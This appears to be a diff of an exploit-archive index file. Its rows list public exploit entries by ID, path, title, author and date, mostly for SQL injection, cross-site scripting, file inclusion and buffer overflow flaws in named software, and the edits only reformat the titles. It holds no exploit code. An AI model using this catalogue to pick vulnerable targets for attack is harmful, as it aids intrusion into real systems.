-31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 -31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0 -31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0 +31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component - 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0 +31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module - 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0 +31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module - 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0 +31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 - (.m3u file) SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0 +31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 - 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0 +31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 - login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31390,platforms/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - browse Action category Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31391,platforms/php/webapps/31391.txt,"Chris LaPointe Download Center 1.2 - search_results Action search Parameter XSS",2008-03-12,ZoRLu,php,webapps,0 +31392,platforms/php/webapps/31392.txt,"MAXdev My eGallery Module 3.04 - For Xoops 'gid' Parameter SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 +31393,platforms/php/webapps/31393.txt,"Jeebles Directory 2.9.60 - Multiple Cross Site Scripting Vulnerabilities",2008-03-12,ZoRLu,php,webapps,0 +31394,platforms/windows/dos/31394.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - 'CSuserCGI.exe' Multiple Remote Vulnerabilities",2008-03-12,felix,windows,dos,0 +31395,platforms/windows/remote/31395.txt,"Cisco User-Changeable Password (UCP) 3.3.4.12.5 - CSUserCGI.exe Help Facility XSS",2008-03-12,felix,windows,remote,0 +31396,platforms/linux/remote/31396.txt,"Lighttpd 1.4.x - mod_userdir Information Disclosure Vulnerability",2008-03-12,julien.cayzac,linux,remote,0 31399,platforms/windows/dos/31399.txt,"McAfee Framework ePolicy 3.x - Orchestrator '_naimcomn_Log' Remote Format String Vulnerability",2008-03-12,"Luigi Auriemma",windows,dos,0 -31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 'printpage.php' SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 -31401,platforms/php/webapps/31401.txt,"Acyhost 'index.php' Remote File Include Vulnerability",2008-03-12,U238,php,webapps,0 -31402,platforms/php/webapps/31402.txt,"eWeather 'chart' Parameter Cross-Site Scripting Vulnerability",2008-03-12,NetJackal,php,webapps,0 -31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x File Checksum Request Denial of Service Vulnerability",2008-03-13,"Milen Rangelov",unix,dos,0 -31404,platforms/asp/webapps/31404.txt,"Virtual Support Office XP 2 'MyIssuesView.asp' SQL Injection Vulnerability",2008-03-13,The-0utl4w,asp,webapps,0 -31405,platforms/windows/remote/31405.c,"XnView 1.92.1 Command-Line Arguments Buffer Overflow Vulnerability",2014-02-05,"Sylvain THUAL",windows,remote,0 -31406,platforms/php/webapps/31406.txt,"SNewsCMS 2.x 'search.php' Cross-Site Scripting Vulnerability",2008-03-17,medprostuda.ru,php,webapps,0 -31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 -31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 'index.php' Cross-Site Scripting Vulnerability",2008-03-17,ZoRLu,php,webapps,0 +31400,platforms/php/webapps/31400.txt,"XOOPS MyTutorials Module 2.1 - 'printpage.php' SQL Injection Vulnerability",2008-03-12,S@BUN,php,webapps,0 +31401,platforms/php/webapps/31401.txt,"Acyhost - 'index.php' Remote File Include Vulnerability",2008-03-12,U238,php,webapps,0 +31402,platforms/php/webapps/31402.txt,"eWeather - 'chart' Parameter Cross-Site Scripting Vulnerability",2008-03-12,NetJackal,php,webapps,0 +31403,platforms/unix/dos/31403.txt,"ZABBIX 1.1x/1.4.x - File Checksum Request Denial of Service Vulnerability",2008-03-13,"Milen Rangelov",unix,dos,0 +31404,platforms/asp/webapps/31404.txt,"Virtual Support Office XP 2 - 'MyIssuesView.asp' SQL Injection Vulnerability",2008-03-13,The-0utl4w,asp,webapps,0 +31405,platforms/windows/remote/31405.c,"XnView 1.92.1 - Command-Line Arguments Buffer Overflow Vulnerability",2014-02-05,"Sylvain THUAL",windows,remote,0 +31406,platforms/php/webapps/31406.txt,"SNewsCMS 2.x - 'search.php' Cross-Site Scripting Vulnerability",2008-03-17,medprostuda.ru,php,webapps,0 +31407,platforms/windows/remote/31407.txt,"MG-SOFT Net Inspector 6.5.0.826 - Multiple Remote Vulnerabilities",2008-03-17,"Luigi Auriemma",windows,remote,0 +31408,platforms/php/webapps/31408.txt,"Cfnetgs 0.24 - 'index.php' Cross-Site Scripting Vulnerability",2008-03-17,ZoRLu,php,webapps,0 31409,platforms/windows/remote/31409.txt,"BootManage TFTP Server 1.99 - 'filename' Remote Buffer Overflow Vulnerability",2008-03-17,"Luigi Auriemma",windows,remote,0 -31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component 'category' Parameter SQL Injection Vulnerability",2008-03-17,The-0utl4w,php,webapps,0 -31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability",2008-03-17,quentin.berdugo,cgi,webapps,0 -31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 Wiki Server Directory Traversal Vulnerability",2008-03-17,"Rodrigo Carvalho",osx,remote,0 -31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 Cross-Site Scripting Vulnerability",2008-03-17,Berezniski,asp,webapps,0 -31414,platforms/php/webapps/31414.txt,"phpstats 0.1_alpha 'phpstats.php' Cross-Site Scripting Vulnerability",2008-03-18,"Hanno Boeck",php,webapps,0 -31415,platforms/php/webapps/31415.txt,"eForum 0.4 'busca.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 -31416,platforms/php/webapps/31416.txt,"webSPELL 4.1.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-18,n3w7u,php,webapps,0 +31410,platforms/php/webapps/31410.txt,"Joomla! and Mambo 'com_guide' Component - 'category' Parameter - SQL Injection Vulnerability",2008-03-17,The-0utl4w,php,webapps,0 +31411,platforms/cgi/webapps/31411.txt,"RSA WebID 5.3 - 'IISWebAgentIF.dll' Cross-Site Scripting Vulnerability",2008-03-17,quentin.berdugo,cgi,webapps,0 +31412,platforms/osx/remote/31412.txt,"Apple Mac OS X Server 10.5 - Wiki Server Directory Traversal Vulnerability",2008-03-17,"Rodrigo Carvalho",osx,remote,0 +31413,platforms/asp/webapps/31413.txt,"Imperva SecureSphere 5.0 - Cross-Site Scripting Vulnerability",2008-03-17,Berezniski,asp,webapps,0 +31414,platforms/php/webapps/31414.txt,"phpstats 0.1_alpha - 'phpstats.php' Cross-Site Scripting Vulnerability",2008-03-18,"Hanno Boeck",php,webapps,0 +31415,platforms/php/webapps/31415.txt,"eForum 0.4 - 'busca.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-18,Omni,php,webapps,0 +31416,platforms/php/webapps/31416.txt,"webSPELL 4.1.2 - 'index.php' Cross-Site Scripting Vulnerability",2008-03-18,n3w7u,php,webapps,0 31418,platforms/php/webapps/31418.txt,"Job Site 1.0 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80 @@ -28234,252 +28234,252 @@ id,file,description,date,author,platform,type,port 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80 -31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 (.asf) - Crash PoC",2014-02-05,Saif,multiple,dos,0 +31429,platforms/multiple/dos/31429.py,"VLC 2.1.2 - (.asf file) Crash PoC",2014-02-05,Saif,multiple,dos,0 31430,platforms/hardware/webapps/31430.txt,"Inteno DG301 - Command Injection",2014-02-05,"Juan J. Guelfo",hardware,webapps,80 31431,platforms/php/webapps/31431.txt,"ImpressCMS 1.3.5 - Multiple Vulnerabilities",2014-02-05,"Pedro Ribeiro",php,webapps,80 -31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS Remote Code Execution",2014-02-05,metasploit,linux,remote,0 -31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80 +31432,platforms/linux/remote/31432.rb,"SkyBlueCanvas CMS - Remote Code Execution",2014-02-05,metasploit,linux,remote,0 +31433,platforms/multiple/remote/31433.rb,"Apache Tomcat Manager - Application Upload Authenticated Code Execution",2014-02-05,metasploit,multiple,remote,80 31434,platforms/java/remote/31434.rb,"Apache Struts Developer Mode OGNL Execution",2014-02-05,metasploit,java,remote,8080 31435,platforms/php/webapps/31435.py,"Joomla JomSocial Component 2.6 - Code Execution Exploit",2014-02-05,"Matias Fontanini",php,webapps,80 31436,platforms/php/webapps/31436.txt,"Pandora FMS 5.0RC1 - Remote Command Injection",2014-02-05,xistence,php,webapps,80 -31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 -31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 List Directories and Folders Information Disclosure Vulnerability",2008-03-18,Linux_Drox,php,webapps,0 -31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 -31441,platforms/php/webapps/31441.txt,"MyBlog 1.x SQL Injection and Remote File Include Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0 -31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 'links.asp' SQL Injection Vulnerability",2008-03-19,xcorpitx,asp,webapps,0 -31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 'index.php' Cross-Site Scripting Vulnerability",2008-03-19,sasquatch,php,webapps,0 -31444,platforms/linux/dos/31444.txt,"MySQL <= 5.1.13 INFORMATION_SCHEMA Remote Denial Of Service Vulnerability",2007-12-05,"Masaaki HIROSE",linux,dos,0 -31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 -31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta 'print.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 -31448,platforms/php/webapps/31448.txt,"Joomla! and Mambo Datsogallery 1.3.1 Component 'id' Parameter SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0 -31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 -31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31438,platforms/java/webapps/31438.txt,"IBM Rational ClearQuest 7.0 - Multiple Parameters Multiple Cross-Site Scripting Vulnerabilities",2008-03-19,sasquatch,java,webapps,0 +31439,platforms/php/webapps/31439.txt,"cPanel 11.18.3 - List Directories and Folders Information Disclosure Vulnerability",2008-03-18,Linux_Drox,php,webapps,0 +31440,platforms/linux/dos/31440.txt,"Asterisk 1.4.x - RTP Codec Payload Handling Multiple Buffer Overflow Vulnerabilities",2008-03-18,"Mu Security research",linux,dos,0 +31441,platforms/php/webapps/31441.txt,"MyBlog 1.x - SQL Injection and Remote File Include Vulnerabilities",2008-03-19,Cod3rZ,php,webapps,0 +31442,platforms/asp/webapps/31442.txt,"Iatek PortalApp 4.0 - 'links.asp' SQL Injection Vulnerability",2008-03-19,xcorpitx,asp,webapps,0 +31443,platforms/php/webapps/31443.txt,"CS-Cart 1.3.2 - 'index.php' Cross-Site Scripting Vulnerability",2008-03-19,sasquatch,php,webapps,0 +31444,platforms/linux/dos/31444.txt,"MySQL <= 5.1.13 - INFORMATION_SCHEMA - Remote Denial Of Service Vulnerability",2007-12-05,"Masaaki HIROSE",linux,dos,0 +31445,platforms/jsp/webapps/31445.txt,"Elastic Path 4.1 - manager/getImportFileRedirect.jsp file Parameter Traversal Arbitrary File Access",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31446,platforms/jsp/webapps/31446.txt,"Elastic Path 4.1 - manager/fileManager.jsp dir Variable Traversal Arbitrary Directory Listing",2008-03-20,"Daniel Martin Gomez",jsp,webapps,0 +31447,platforms/php/webapps/31447.txt,"News-Template 0.5beta - 'print.php' Multiple Cross Site Scripting Vulnerabilities",2008-03-20,ZoRLu,php,webapps,0 +31448,platforms/php/webapps/31448.txt,"Joomla! and Mambo Datsogallery 1.3.1 Component - 'id' Parameter SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0 +31449,platforms/php/webapps/31449.txt,"W-Agora 4.0 - add_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31450,platforms/php/webapps/31450.txt,"W-Agora 4.0 - create_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31451,platforms/php/webapps/31451.txt,"W-Agora 4.0 - create_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31452,platforms/php/webapps/31452.txt,"W-Agora 4.0 - delete_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31453,platforms/php/webapps/31453.txt,"W-Agora 4.0 - delete_user.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31454,platforms/php/webapps/31454.txt,"W-Agora 4.0 - edit_forum.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 - mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 - moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 +31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 - reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0 31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80 31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80 31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0 31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0 -31462,platforms/linux/remote/31462.c,"xine-lib Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 -31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0 -31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0 -31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0 -31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 -31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 -31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 -31469,platforms/php/webapps/31469.txt,"ooComments 1.0 classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 -31470,platforms/php/webapps/31470.txt,"ooComments 1.0 classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 -31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0 -31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0 -31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 -31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0 -31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0 -31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0 -31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0 -31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0 -31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0 -31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0 -31515,platforms/php/webapps/31515.txt,"osCommerce 2.3.3.4 (geo_zones.php, zID param) - SQL Injection Vulnerability",2014-02-07,"Ahmed Aboul-Ela",php,webapps,80 +31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0 +31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' - SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0 +31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 - IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0 +31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 - Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0 +31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 - 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0 +31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0 +31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 +31469,platforms/php/webapps/31469.txt,"ooComments 1.0 - classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31470,platforms/php/webapps/31470.txt,"ooComments 1.0 - classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0 +31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 - 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0 +31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 - 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0 +31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 - Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0 +31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A - Multiple Remote 